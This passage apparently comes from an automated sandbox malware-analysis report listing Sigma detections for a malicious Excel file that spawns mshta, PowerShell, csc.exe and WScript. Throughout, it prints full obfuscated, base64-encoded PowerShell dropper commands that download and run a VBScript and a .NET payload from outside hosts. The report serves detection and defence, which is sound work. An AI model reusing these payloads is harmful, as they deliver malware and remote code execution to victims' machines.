J1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1h
                  Sigma detected: Suspicious MSHTA Child Process
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))", CommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgI
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3356, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3652, ProcessName: mshta.exe
                  Sigma detected: Suspicious PowerShell Parameter Substring
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE, ProcessId: 3892, ProcessName: powershell.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , ProcessId: 4084, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1h
                  Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline", ProcessId: 3992, ProcessName: csc.exe
                  Sigma detected: Excel Network Connections
                  Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 198.244.140.41, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3356, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3760, TargetFilename: C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs
                  Sigma detected: Suspicious Office Outbound Connections
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3356, Protocol: tcp, SourceIp: 198.244.140.41, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" , ProcessId: 4084, ProcessName: wscript.exe
                  Sigma detected: Dynamic CSharp Compile Artefact
